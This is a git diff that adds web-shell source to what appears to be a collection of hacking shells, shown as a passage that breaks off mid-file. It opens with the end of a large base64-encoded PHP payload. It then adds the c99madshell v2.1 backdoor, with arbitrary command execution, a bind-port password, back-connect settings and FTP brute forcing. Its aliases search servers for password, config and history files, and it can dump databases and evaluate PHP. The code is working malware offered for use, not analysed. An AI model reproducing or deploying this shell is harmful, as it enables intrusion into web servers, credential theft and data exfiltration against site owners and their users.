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')));
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c99madshell_v2.1.php.php.txt b/xakep-shells/PHP/c99madshell_v2.1.php.php.txt
new file mode 100644
index 0000000..ae1cf72
--- /dev/null
+++ b/xakep-shells/PHP/c99madshell_v2.1.php.php.txt
@@ -0,0 +1,2517 @@
+<?
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "2.1 madnet edition ADVANCED";
+if (empty($surl))
+{
+ $surl = $_SERVER['PHP_SELF'];
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0;
+$host_allow = array("*");
+$login_txt = "Admin area";
+$accessdeniedmess = "die like the rest";
+$gzipencode = TRUE;
+$c99sh_sourcesurl = ""; //Sources-server
+$filestealth = TRUE;
+$donated_html = "";
+$donated_act = array("");
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_log = "./";
+
+$log_email = "user@host.gov";
+$sort_default = "0a";
+$sort_save = TRUE;
+
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"),
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a");
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 100;
+$bindport_pass = "c99mad";
+$bindport_port = "31373";
+$bc_port = "31373";
+$datapipe_localport = "8081";
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars";
+
+$usefsbuff = TRUE;
+$copy_unset = FALSE;
+
+$quicklaunch = array(
+ array("<b><hr>HOME</b>",$surl),
+ array("<b><=</b>","#\" onclick=\"history.back(1)"),
+ array("<b>=></b>","#\" onclick=\"history.go(1)"),
+ array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"),
+ array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+/////////////////////////////////////
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+
+if (isset($_POST['act'])) $act  = $_POST['act'];
+if (isset($_POST['d'])) $d    = urldecode($_POST['d']);
+if (isset($_POST['sort'])) $sort = $_POST['sort'];
+if (isset($_POST['f'])) $f    = $_POST['f'];
+if (isset($_POST['ft'])) $ft   = $_POST['ft'];
+if (isset($_POST['grep'])) $grep = $_POST['grep'];
+if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort'];
+if (isset($_POST['pid'])) $pid  = $_POST['pid'];
+if (isset($_POST['sig'])) $sig  = $_POST['sig'];
+if (isset($_POST['base64'])) $base64  = $_POST['base64'];
+if (isset($_POST['fullhexdump'])) $fullhexdump  = $_POST['fullhexdump'];
+if (isset($_POST['c'])) $c  = $_POST['c'];
+if (isset($_POST['white'])) $white  = $_POST['white'];
+if (isset($_POST['nixpasswd'])) $nixpasswd  = $_POST['nixpasswd'];
+
+$lastdir = realpath(".");
+chdir($curdir);
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99madShell.SQL v. ".$shver."
+# Home page: http://securityprobe.net
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ $sql_query = urldecode($sql_query);
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
